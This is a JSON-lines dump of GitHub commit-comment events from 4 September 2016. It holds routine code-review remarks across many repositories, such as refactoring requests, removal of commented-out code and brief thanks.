{"id":"4513654713","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18892922,"position":null,"line":null,"path":null,"commit_id":"56b8c37001bde4107b9b73a8c4000d2dceaa0a99","created_at":"2016-09-04T12:12:04Z","updated_at":"2016-09-04T12:12:04Z","body":"did #4 "}},"created_at":"2016-09-04T12:12:04Z"}
{"id":"4513654956","type":"CommitCommentEvent","actor":{"login":"zxyuling"},"repo":{"name":"lzq129/test"},"payload":{"comment":{"id":18892923,"position":38,"line":38,"path":"js.md","commit_id":"1058439bb389105c0609a5db2b359d0908461565","created_at":"2016-09-04T12:12:17Z","updated_at":"2016-09-04T12:12:17Z","body":"仔细看看push()的作用"}},"created_at":"2016-09-04T12:12:17Z"}
{"id":"4513655332","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18892924,"position":null,"line":null,"path":null,"commit_id":"c02761a3f593000d36be09ad9e7267d671167a67","created_at":"2016-09-04T12:12:37Z","updated_at":"2016-09-04T12:12:37Z","body":"did #2 "}},"created_at":"2016-09-04T12:12:37Z"}
{"id":"4513655368","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":18892925,"position":null,"line":null,"path":null,"commit_id":"9d858276c1ef029fbc96dcbb401a0f10755016d4","created_at":"2016-09-04T12:12:39Z","updated_at":"2016-09-04T12:12:39Z","body":"Would this have a better chance to pass if you trigger your new conditions \r\nonly in the late endgame ?\r\nFor example where \r\n`non pawn material[WHITE] <= RookValueMg && non material[BLACK] <= RookValueMg `\r\n\r\n"}},"created_at":"2016-09-04T12:12:39Z"}
{"id":"4513655426","type":"CommitCommentEvent","actor":{"login":"zxyuling"},"repo":{"name":"lzq129/test"},"payload":{"comment":{"id":18892926,"position":39,"line":39,"path":"js.md","commit_id":"1058439bb389105c0609a5db2b359d0908461565","created_at":"2016-09-04T12:12:42Z","updated_at":"2016-09-04T12:12:42Z","body":"仔细看看reserve的作用"}},"created_at":"2016-09-04T12:12:42Z"}
{"id":"4513656770","type":"CommitCommentEvent","actor":{"login":"zxyuling"},"repo":{"name":"lzq129/test"},"payload":{"comment":{"id":18892927,"position":null,"line":null,"path":null,"commit_id":"1058439bb389105c0609a5db2b359d0908461565","created_at":"2016-09-04T12:13:59Z","updated_at":"2016-09-04T12:13:59Z","body":"总体来说还不错"}},"created_at":"2016-09-04T12:13:59Z"}
{"id":"4513659233","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892929,"position":100,"line":86,"path":"test/CRUD/crud_service_room_resourceTest.js","commit_id":"30a8cec74c76579cefb9476b4d611523a9c06506","created_at":"2016-09-04T12:16:04Z","updated_at":"2016-09-04T12:16:04Z","body":"probably this could be moved to function? Something like this\r\n\r\nvar resource = getElement(resourceList,resourceId);\r\n\r\nremoving from the tests logical steps"}},"created_at":"2016-09-04T12:16:04Z"}
{"id":"4513659834","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892930,"position":100,"line":86,"path":"test/CRUD/crud_service_room_resourceTest.js","commit_id":"30a8cec74c76579cefb9476b4d611523a9c06506","created_at":"2016-09-04T12:16:32Z","updated_at":"2016-09-04T12:16:32Z","body":"the found var I woul rather prefer to change it to resource."}},"created_at":"2016-09-04T12:16:32Z"}
{"id":"4513659954","type":"CommitCommentEvent","actor":{"login":"Procrat"},"repo":{"name":"ZeusWPI/zeus.ugent.be"},"payload":{"comment":{"id":18892931,"position":null,"line":null,"path":null,"commit_id":"6b5bb351c13a4424e71cb8f32f67e272d75a7990","created_at":"2016-09-04T12:16:37Z","updated_at":"2016-09-04T12:16:37Z","body":"⭕ "}},"created_at":"2016-09-04T12:16:37Z"}
{"id":"4513660967","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892932,"position":82,"line":76,"path":"test/CRUD/crud_service_room_resourceTest.js","commit_id":"30a8cec74c76579cefb9476b4d611523a9c06506","created_at":"2016-09-04T12:17:24Z","updated_at":"2016-09-04T12:17:24Z","body":"change to resource \r\n\r\n"}},"created_at":"2016-09-04T12:17:24Z"}
{"id":"4513661157","type":"CommitCommentEvent","actor":{"login":"LebedevRI"},"repo":{"name":"darktable-org/darktable"},"payload":{"comment":{"id":18892933,"position":208,"line":776,"path":"src/iop/shadhi.c","commit_id":"2cd643196e555d9020cb4cd046463338dd6c6caa","created_at":"2016-09-04T12:17:33Z","updated_at":"2016-09-04T12:17:33Z","body":"I personally wanted this to attempt to correct unnaturally-looking clipped highlighs (which are really bright) after applying negative exposure correction.\r\nBut i have done some experimentation, and i think there may be an other way\r\nhttp://imgur.com/a/of7Ff\r\nhttps://github.com/LebedevRI/darktable/commits/iop-brighten-clipped-white"}},"created_at":"2016-09-04T12:17:33Z"}
{"id":"4513661435","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18892934,"position":10,"line":80,"path":"application/helpers/qanda_helper.php","commit_id":"3c4c4dc6e9ca75cd357b6186d16d8c36adfd3e4a","created_at":"2016-09-04T12:17:50Z","updated_at":"2016-09-04T12:17:50Z","body":"You're right about qanda[0], it's an array. I will push the correction."}},"created_at":"2016-09-04T12:17:50Z"}
{"id":"4513662888","type":"CommitCommentEvent","actor":{"login":"abhisheksoni27"},"repo":{"name":"BrownBagJMI/AndroidGists"},"payload":{"comment":{"id":18892937,"position":null,"line":null,"path":null,"commit_id":"1291293c80c38992761b1c308f4115b427e2bfa0","created_at":"2016-09-04T12:18:58Z","updated_at":"2016-09-04T12:18:58Z","body":"Cool."}},"created_at":"2016-09-04T12:18:58Z"}
{"id":"4513663802","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892939,"position":84,"line":78,"path":"test/CRUD/crud_service_room_resourceTest.js","commit_id":"30a8cec74c76579cefb9476b4d611523a9c06506","created_at":"2016-09-04T12:19:42Z","updated_at":"2016-09-04T12:19:42Z","body":"If it is implemented a function that returns the element you would not needed to what you are doing right now (found[0])"}},"created_at":"2016-09-04T12:19:42Z"}
{"id":"4513665359","type":"CommitCommentEvent","actor":{"login":"BridouZ"},"repo":{"name":"nilsbraden/ttrss-reader-fork"},"payload":{"comment":{"id":18892940,"position":null,"line":null,"path":null,"commit_id":"8d4aed5a85054edd053e2cb44d4809d1fc8e8c4a","created_at":"2016-09-04T12:21:02Z","updated_at":"2016-09-04T12:21:02Z","body":"Thanks, sync issues are kow fixed when used with LetsEncrypt :)"}},"created_at":"2016-09-04T12:21:02Z"}
{"id":"4513668581","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892941,"position":21,"line":37,"path":"lib/RequestManager/manager_meeting.js","commit_id":"fa6a662dda6013ec979695c5a3114d5dabcc1f33","created_at":"2016-09-04T12:23:35Z","updated_at":"2016-09-04T12:23:35Z","body":"remove this"}},"created_at":"2016-09-04T12:23:35Z"}
{"id":"4513669423","type":"CommitCommentEvent","actor":{"login":"ananyaneogi"},"repo":{"name":"ananyaneogi/Histoire"},"payload":{"comment":{"id":18892943,"position":null,"line":null,"path":null,"commit_id":"c323764892bb0560ef11f6cbf64da2e7d56df5a0","created_at":"2016-09-04T12:24:15Z","updated_at":"2016-09-04T12:24:15Z","body":"final"}},"created_at":"2016-09-04T12:24:15Z"}
{"id":"4513669521","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892944,"position":29,"line":56,"path":"lib/RequestManager/manager_meeting.js","commit_id":"fa6a662dda6013ec979695c5a3114d5dabcc1f33","created_at":"2016-09-04T12:24:19Z","updated_at":"2016-09-04T12:24:19Z","body":"remove this "}},"created_at":"2016-09-04T12:24:19Z"}
{"id":"4513670091","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892945,"position":37,"line":76,"path":"lib/RequestManager/manager_meeting.js","commit_id":"fa6a662dda6013ec979695c5a3114d5dabcc1f33","created_at":"2016-09-04T12:24:40Z","updated_at":"2016-09-04T12:24:40Z","body":"remove this no commented code should be submitted"}},"created_at":"2016-09-04T12:24:40Z"}
{"id":"4513670375","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892946,"position":45,"line":94,"path":"lib/RequestManager/manager_meeting.js","commit_id":"fa6a662dda6013ec979695c5a3114d5dabcc1f33","created_at":"2016-09-04T12:24:52Z","updated_at":"2016-09-04T12:24:52Z","body":"remover"}},"created_at":"2016-09-04T12:24:52Z"}
{"id":"4513670536","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892947,"position":53,"line":113,"path":"lib/RequestManager/manager_meeting.js","commit_id":"fa6a662dda6013ec979695c5a3114d5dabcc1f33","created_at":"2016-09-04T12:25:00Z","updated_at":"2016-09-04T12:25:00Z","body":"remover\r\n"}},"created_at":"2016-09-04T12:25:00Z"}
{"id":"4513671065","type":"CommitCommentEvent","actor":{"login":"yama"},"repo":{"name":"modxcms-jp/evolution-jp"},"payload":{"comment":{"id":18892948,"position":null,"line":null,"path":null,"commit_id":"bfe7c54f0137a554d4fe2c76f672f1e8d261e920","created_at":"2016-09-04T12:25:25Z","updated_at":"2016-09-04T12:25:25Z","body":"Remove\r\n$modx->documentMethod\r\n$modx->minParserPasses\r\n$modx->virtualDir\r\n\r\n$modx->cleanDocumentIdentifier()\r\n$modx->setRequestUri()\r\n$modx->getDocumentIdentifier()"}},"created_at":"2016-09-04T12:25:25Z"}
{"id":"4513671453","type":"CommitCommentEvent","actor":{"login":"axel30"},"repo":{"name":"axel30/GIBOX"},"payload":{"comment":{"id":18892949,"position":16,"line":16,"path":"README.md","commit_id":"355bca50c457f7d134af9b13d3e52c2ae6c3e132","created_at":"2016-09-04T12:25:47Z","updated_at":"2016-09-04T12:25:47Z","body":"klkkl"}},"created_at":"2016-09-04T12:25:47Z"}
{"id":"4513672238","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892952,"position":5,"line":54,"path":"test/BDT/bdt_createMeetingOnOutOfOrderSchedule.js","commit_id":"fa6a662dda6013ec979695c5a3114d5dabcc1f33","created_at":"2016-09-04T12:26:27Z","updated_at":"2016-09-04T12:26:27Z","body":"the values of the URL, you think that it would be better if we get them from .json file?"}},"created_at":"2016-09-04T12:26:27Z"}
{"id":"4513672242","type":"CommitCommentEvent","actor":{"login":"axel30"},"repo":{"name":"axel30/GIBOX"},"payload":{"comment":{"id":18892953,"position":16,"line":16,"path":"README.md","commit_id":"355bca50c457f7d134af9b13d3e52c2ae6c3e132","created_at":"2016-09-04T12:26:27Z","updated_at":"2016-09-04T12:26:27Z","body":"lllll"}},"created_at":"2016-09-04T12:26:27Z"}
{"id":"4513672460","type":"CommitCommentEvent","actor":{"login":"PeteinOS"},"repo":{"name":"munjeni/DSL-2740B-OSCAM"},"payload":{"comment":{"id":18892954,"position":null,"line":null,"path":null,"commit_id":"261b43cce4c244445187c02cb11af722dd29e0fe","created_at":"2016-09-04T12:26:41Z","updated_at":"2016-09-04T12:26:41Z","body":"Hello my friend (munjeni). I like your CCcam line tester (http://munjeni.myiphost.com:808/) very nice work. \r\nI want to ask you a favor... i want an .exe from your app. (tester.exe)\r\nIts possible?"}},"created_at":"2016-09-04T12:26:41Z"}
{"id":"4513672831","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892955,"position":14,"line":93,"path":"test/CRUD/crud_meetingsTest.js","commit_id":"fa6a662dda6013ec979695c5a3114d5dabcc1f33","created_at":"2016-09-04T12:26:58Z","updated_at":"2016-09-04T12:26:58Z","body":"remove this"}},"created_at":"2016-09-04T12:26:58Z"}
{"id":"4513673010","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892956,"position":15,"line":94,"path":"test/CRUD/crud_meetingsTest.js","commit_id":"fa6a662dda6013ec979695c5a3114d5dabcc1f33","created_at":"2016-09-04T12:27:07Z","updated_at":"2016-09-04T12:27:07Z","body":"remove this"}},"created_at":"2016-09-04T12:27:07Z"}
{"id":"4513673632","type":"CommitCommentEvent","actor":{"login":"ordavidil"},"repo":{"name":"capacity4dev/capacity4more"},"payload":{"comment":{"id":18892957,"position":14,"line":314,"path":"project/profiles/capacity4more/modules/c4m/og/c4m_og/c4m_og.module","commit_id":"a4f914b0aa8c7ec45ab3b3d1c581ffa4a84669bd","created_at":"2016-09-04T12:27:33Z","updated_at":"2016-09-04T12:27:33Z","body":"@soniCaH \r\nThis should be only on an access callback, this does not seems the right case..."}},"created_at":"2016-09-04T12:27:33Z"}
{"id":"4513674409","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892959,"position":163,"line":120,"path":"test/CRUD/crud_outOfOrderTest.js","commit_id":"fa6a662dda6013ec979695c5a3114d5dabcc1f33","created_at":"2016-09-04T12:28:16Z","updated_at":"2016-09-04T12:28:16Z","body":"remove this"}},"created_at":"2016-09-04T12:28:16Z"}
{"id":"4513674915","type":"CommitCommentEvent","actor":{"login":"smbkr"},"repo":{"name":"smbkr/timething"},"payload":{"comment":{"id":18892960,"position":null,"line":null,"path":null,"commit_id":"c1f161340bbb249dce7c5c9a68e389aa9affbba0","created_at":"2016-09-04T12:28:45Z","updated_at":"2016-09-04T12:28:45Z","body":"Of course I actually meant _linting_, but OS X autocorrect has other ideas..."}},"created_at":"2016-09-04T12:28:45Z"}
{"id":"4513675802","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18892961,"position":5,"line":62,"path":"src/game/AI/CreatureAISelector.cpp","commit_id":"8835ddf39694260c2234c0ca4b3c54e705aa44ff","created_at":"2016-09-04T12:29:32Z","updated_at":"2016-09-04T12:29:32Z","body":"Poke @Phatcat on this"}},"created_at":"2016-09-04T12:29:32Z"}
{"id":"4513675847","type":"CommitCommentEvent","actor":{"login":"Jcambass"},"repo":{"name":"CGA1123/helpy"},"payload":{"comment":{"id":18892962,"position":null,"line":null,"path":null,"commit_id":"211f0a05b0b1f5e9f83daefc1ce0cd7e92f30098","created_at":"2016-09-04T12:29:34Z","updated_at":"2016-09-04T12:29:34Z","body":"@CGA1123 I corrected the translations, but there are still some strings that aren't even in the translation files, I will have a look at it next week."}},"created_at":"2016-09-04T12:29:34Z"}
{"id":"4513676576","type":"CommitCommentEvent","actor":{"login":"ordavidil"},"repo":{"name":"capacity4dev/capacity4more"},"payload":{"comment":{"id":18892965,"position":14,"line":314,"path":"project/profiles/capacity4more/modules/c4m/og/c4m_og/c4m_og.module","commit_id":"a4f914b0aa8c7ec45ab3b3d1c581ffa4a84669bd","created_at":"2016-09-04T12:30:14Z","updated_at":"2016-09-04T12:30:14Z","body":"It seems like you've added this one because of\r\n```php\r\nfunction c4m_content_share_menu() {\r\n  $items = array();\r\n\r\n  $items['node/%node/share'] = array(\r\n    'title' => 'Share content to another group',\r\n    'page callback' => 'drupal_get_form',\r\n    'page arguments' => array('c4m_content_share_form'),\r\n    'access callback' => 'c4m_og_user_is_member',\r\n    'file' => 'c4m_content_share.pages.inc',\r\n    'type' => MENU_CALLBACK,\r\n  );\r\n\r\n  return $items;\r\n}\r\n```\r\n\r\nwhere this function is being called as an access callback, but it is probably better to create a new access callback for that."}},"created_at":"2016-09-04T12:30:14Z"}
{"id":"4513676857","type":"CommitCommentEvent","actor":{"login":"Henningstone"},"repo":{"name":"AllTheHaxx/AllTheHaxx"},"payload":{"comment":{"id":18892966,"position":null,"line":null,"path":null,"commit_id":"92bb0201484918ce83dbc5da14f774d0b5a0b1df","created_at":"2016-09-04T12:30:24Z","updated_at":"2016-09-04T12:30:24Z","body":"ja awa"}},"created_at":"2016-09-04T12:30:24Z"}
{"id":"4513677051","type":"CommitCommentEvent","actor":{"login":"shinnn"},"repo":{"name":"underyx/underyx.me"},"payload":{"comment":{"id":18892968,"position":null,"line":null,"path":null,"commit_id":"849425843c7af42ddcff77882613a02525bd6ab2","created_at":"2016-09-04T12:30:33Z","updated_at":"2016-09-04T12:30:33Z","body":"Thanks :)\r\n"}},"created_at":"2016-09-04T12:30:33Z"}
{"id":"4513677119","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18892969,"position":null,"line":null,"path":null,"commit_id":"8835ddf39694260c2234c0ca4b3c54e705aa44ff","created_at":"2016-09-04T12:30:36Z","updated_at":"2016-09-04T12:30:36Z","body":"Thank the best would be to now what creature caused that.\r\n@boxa When you have time i want you to talk to you on irc ;)"}},"created_at":"2016-09-04T12:30:36Z"}
{"id":"4513677654","type":"CommitCommentEvent","actor":{"login":"abbradar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18892970,"position":null,"line":null,"path":null,"commit_id":"8d977ead386cf29b8b395caca536bfaec9c36efe","created_at":"2016-09-04T12:31:03Z","updated_at":"2016-09-04T12:31:03Z","body":"I could look into this at the week after this, I think, if it's okay to use `/var/setuid-wrappers` tmpfs again."}},"created_at":"2016-09-04T12:31:03Z"}
{"id":"4513678370","type":"CommitCommentEvent","actor":{"login":"underyx"},"repo":{"name":"underyx/underyx.me"},"payload":{"comment":{"id":18892971,"position":null,"line":null,"path":null,"commit_id":"849425843c7af42ddcff77882613a02525bd6ab2","created_at":"2016-09-04T12:31:41Z","updated_at":"2016-09-04T12:31:41Z","body":"No, thank *you* @shinnn :cat: "}},"created_at":"2016-09-04T12:31:41Z"}
{"id":"4513678444","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18892972,"position":null,"line":null,"path":null,"commit_id":"8d977ead386cf29b8b395caca536bfaec9c36efe","created_at":"2016-09-04T12:31:43Z","updated_at":"2016-09-04T12:31:43Z","body":"Sure. cc @shlevy "}},"created_at":"2016-09-04T12:31:43Z"}
{"id":"4513678686","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892973,"position":164,"line":121,"path":"test/CRUD/crud_outOfOrderTest.js","commit_id":"fa6a662dda6013ec979695c5a3114d5dabcc1f33","created_at":"2016-09-04T12:31:58Z","updated_at":"2016-09-04T12:31:58Z","body":"it is weird this sort of assertion, would it be better if it is changed to something like\r\n\r\n**expect(id).to.equal(expectedId)**"}},"created_at":"2016-09-04T12:31:58Z"}
{"id":"4513680874","type":"CommitCommentEvent","actor":{"login":"universam1"},"repo":{"name":"mikeller/Arduino"},"payload":{"comment":{"id":18892974,"position":34,"line":368,"path":"hardware/arduino/avr/libraries/SoftwareSerial/src/SoftwareSerial.cpp","commit_id":"69b5d8937dc08fcf481cf3172ffe947d329bca7d","created_at":"2016-09-04T12:33:45Z","updated_at":"2016-09-04T12:33:45Z","body":"should be 0x03"}},"created_at":"2016-09-04T12:33:45Z"}
{"id":"4513680997","type":"CommitCommentEvent","actor":{"login":"fishbar"},"repo":{"name":"fishbar/mbook"},"payload":{"comment":{"id":18892975,"position":55,"line":99,"path":"lib/book_file.js","commit_id":"bbd21116d18a6cb9309e440b4d55cde77218c1d8","created_at":"2016-09-04T12:33:52Z","updated_at":"2016-09-04T12:33:52Z","body":"fs已经引入一个  fs-promise模块， 可以直接使用那个模块"}},"created_at":"2016-09-04T12:33:52Z"}
{"id":"4513681098","type":"CommitCommentEvent","actor":{"login":"universam1"},"repo":{"name":"mikeller/Arduino"},"payload":{"comment":{"id":18892976,"position":4,"line":71,"path":"hardware/arduino/avr/libraries/SoftwareSerial/src/SoftwareSerial.h","commit_id":"69b5d8937dc08fcf481cf3172ffe947d329bca7d","created_at":"2016-09-04T12:33:57Z","updated_at":"2016-09-04T12:33:57Z","body":"and here :4\r\n"}},"created_at":"2016-09-04T12:33:57Z"}
{"id":"4513683743","type":"CommitCommentEvent","actor":{"login":"CGA1123"},"repo":{"name":"CGA1123/helpy"},"payload":{"comment":{"id":18892981,"position":null,"line":null,"path":null,"commit_id":"211f0a05b0b1f5e9f83daefc1ce0cd7e92f30098","created_at":"2016-09-04T12:36:12Z","updated_at":"2016-09-04T12:36:12Z","body":"Sounds great!"}},"created_at":"2016-09-04T12:36:12Z"}
{"id":"4513684781","type":"CommitCommentEvent","actor":{"login":"abrander"},"repo":{"name":"asdine/storm"},"payload":{"comment":{"id":18892984,"position":null,"line":null,"path":null,"commit_id":"75b7df7a2274a463ac657057956d6c8a16e54694","created_at":"2016-09-04T12:37:04Z","updated_at":"2016-09-04T12:37:04Z","body":"I'm not disagreeing, but why this change?"}},"created_at":"2016-09-04T12:37:04Z"}
{"id":"4513685112","type":"CommitCommentEvent","actor":{"login":"mangman01"},"repo":{"name":"mangman01/mangman"},"payload":{"comment":{"id":18892985,"position":null,"line":null,"path":null,"commit_id":"3adf034159bec3476bd5294ca51a2eb0e7a09d6f","created_at":"2016-09-04T12:37:19Z","updated_at":"2016-09-04T12:37:19Z","body":"master"}},"created_at":"2016-09-04T12:37:19Z"}
{"id":"4513685707","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892986,"position":2,"line":95,"path":"lib/RequestManager/manager_outOfOrder.js","commit_id":"21a25bd0cd4c7da0732881d31b57f41653239456","created_at":"2016-09-04T12:37:51Z","updated_at":"2016-09-04T12:37:51Z","body":"@angy113 you all still need to add the logger here right?"}},"created_at":"2016-09-04T12:37:51Z"}
{"id":"4513686178","type":"CommitCommentEvent","actor":{"login":"NeutronS21"},"repo":{"name":"ZIM555/android_device_samsung_fortuna3g"},"payload":{"comment":{"id":18892990,"position":null,"line":null,"path":null,"commit_id":"f109dc242d55c8417770cb21dee19d489ea763d6","created_at":"2016-09-04T12:38:14Z","updated_at":"2016-09-04T12:38:14Z","body":"Hey, is there a way to talk directly to u about the fz variant?"}},"created_at":"2016-09-04T12:38:14Z"}
{"id":"4513686874","type":"CommitCommentEvent","actor":{"login":"Roboe"},"repo":{"name":"Roboe/android_kernel_fairphone_fp2"},"payload":{"comment":{"id":18892994,"position":null,"line":null,"path":null,"commit_id":"f2a065870b15fab208a5b5e36272ea29b1d63712","created_at":"2016-09-04T12:38:50Z","updated_at":"2016-09-04T12:38:50Z","body":"The warning makes the build stop with newer perl compilers than the one shipped with Ubuntu 14.04, and this patch make the kernel build fine. The behaviour of the code is the same.\r\n\r\nHere's the B2G Bugzilla bug where I got the patch: https://bugzilla.mozilla.org/show_bug.cgi?id=1231340"}},"created_at":"2016-09-04T12:38:50Z"}
{"id":"4513686877","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18892995,"position":21,"line":62,"path":"test/CRUD/crud_roomTest.js","commit_id":"21a25bd0cd4c7da0732881d31b57f41653239456","created_at":"2016-09-04T12:38:50Z","updated_at":"2016-09-04T12:38:50Z","body":"Move to a function that retorns the total found or list of found elements"}},"created_at":"2016-09-04T12:38:50Z"}
{"id":"4513687399","type":"CommitCommentEvent","actor":{"login":"bixuanzju"},"repo":{"name":"commercialhaskell/intero"},"payload":{"comment":{"id":18892996,"position":null,"line":null,"path":null,"commit_id":"ecd5e98380fd72e9f41671f65753e76fc0b95dc3","created_at":"2016-09-04T12:39:16Z","updated_at":"2016-09-04T12:39:16Z","body":"> Debugger entered--Lisp error: (void-function replace-in-string)"}},"created_at":"2016-09-04T12:39:16Z"}
{"id":"4513688035","type":"CommitCommentEvent","actor":{"login":"dyacob"},"repo":{"name":"w3c/elreq"},"payload":{"comment":{"id":18893000,"position":null,"line":null,"path":null,"commit_id":"b72c11b26addf4d27a6b07354100d384ba25fcac","created_at":"2016-09-04T12:39:47Z","updated_at":"2016-09-04T12:39:47Z","body":"This closes Issue #1 "}},"created_at":"2016-09-04T12:39:47Z"}
{"id":"4513690935","type":"CommitCommentEvent","actor":{"login":"wasdennnoch"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":18893009,"position":null,"line":null,"path":null,"commit_id":"45feb21cda920759480f1d2e00728402a3f3255b","created_at":"2016-09-04T12:42:02Z","updated_at":"2016-09-04T12:42:02Z","body":"I'll fix it when I'm back home. "}},"created_at":"2016-09-04T12:42:02Z"}
{"id":"4513692171","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18893010,"position":66,"line":45,"path":"test/CRUD/crud_room_resourceTest.js","commit_id":"9ea39e4bbcda62f6add900c4fe937841da06d6c0","created_at":"2016-09-04T12:43:01Z","updated_at":"2016-09-04T12:43:01Z","body":"move this to a function."}},"created_at":"2016-09-04T12:43:01Z"}
{"id":"4513692996","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18893011,"position":100,"line":65,"path":"test/CRUD/crud_room_resourceTest.js","commit_id":"9ea39e4bbcda62f6add900c4fe937841da06d6c0","created_at":"2016-09-04T12:43:39Z","updated_at":"2016-09-04T12:43:39Z","body":"move to a function"}},"created_at":"2016-09-04T12:43:39Z"}
{"id":"4513693684","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18893012,"position":115,"line":75,"path":"test/CRUD/crud_room_resourceTest.js","commit_id":"9ea39e4bbcda62f6add900c4fe937841da06d6c0","created_at":"2016-09-04T12:44:12Z","updated_at":"2016-09-04T12:44:12Z","body":"move to a function"}},"created_at":"2016-09-04T12:44:12Z"}
{"id":"4513693923","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18893013,"position":116,"line":76,"path":"test/CRUD/crud_room_resourceTest.js","commit_id":"9ea39e4bbcda62f6add900c4fe937841da06d6c0","created_at":"2016-09-04T12:44:24Z","updated_at":"2016-09-04T12:44:24Z","body":"move to a function"}},"created_at":"2016-09-04T12:44:24Z"}
{"id":"4513694191","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18893014,"position":139,"line":87,"path":"test/CRUD/crud_room_resourceTest.js","commit_id":"9ea39e4bbcda62f6add900c4fe937841da06d6c0","created_at":"2016-09-04T12:44:40Z","updated_at":"2016-09-04T12:44:40Z","body":"move to a function"}},"created_at":"2016-09-04T12:44:40Z"}
{"id":"4513694374","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18893015,"position":140,"line":88,"path":"test/CRUD/crud_room_resourceTest.js","commit_id":"9ea39e4bbcda62f6add900c4fe937841da06d6c0","created_at":"2016-09-04T12:44:48Z","updated_at":"2016-09-04T12:44:48Z","body":"move to a function"}},"created_at":"2016-09-04T12:44:48Z"}
{"id":"4513698026","type":"CommitCommentEvent","actor":{"login":"jaraco"},"repo":{"name":"bukzor/ohai"},"payload":{"comment":{"id":18893018,"position":25,"line":25,"path":"setup.py","commit_id":"8ab24c97b813b07dd5426fdc423ce7c6ef6765b2","created_at":"2016-09-04T12:47:47Z","updated_at":"2016-09-04T12:47:47Z","body":"I notice here you're using extra_path, which is [being deprecated](http://bugs.python.org/issue27919). Please comment in that ticket if support for this feature is something you wish to retain."}},"created_at":"2016-09-04T12:47:47Z"}
{"id":"4513698550","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"vshaxe/haxe-languageserver"},"payload":{"comment":{"id":18893020,"position":null,"line":null,"path":null,"commit_id":"c8a746e1f98a856f41bfea6a8c58f74fc30d9ad8","created_at":"2016-09-04T12:48:11Z","updated_at":"2016-09-04T12:48:11Z","body":"this package really be named \"uglyhacks\" :)"}},"created_at":"2016-09-04T12:48:11Z"}
{"id":"4513699273","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18893023,"position":6,"line":56,"path":"test/Smoke/st_servicesTest.js","commit_id":"5e60c36fd6e22747badca52bdb5d13e9f03f1b39","created_at":"2016-09-04T12:48:47Z","updated_at":"2016-09-04T12:48:47Z","body":"When doing a PUT I would recommned on changing the description for instance the impersonation could go with a different set oftests?"}},"created_at":"2016-09-04T12:48:47Z"}
{"id":"4513699630","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"vshaxe/haxe-languageserver"},"payload":{"comment":{"id":18893024,"position":null,"line":null,"path":null,"commit_id":"c8a746e1f98a856f41bfea6a8c58f74fc30d9ad8","created_at":"2016-09-04T12:49:05Z","updated_at":"2016-09-04T12:49:05Z","body":"I don't think `PathHelper` isn't _that_ terrible. ;D"}},"created_at":"2016-09-04T12:49:05Z"}
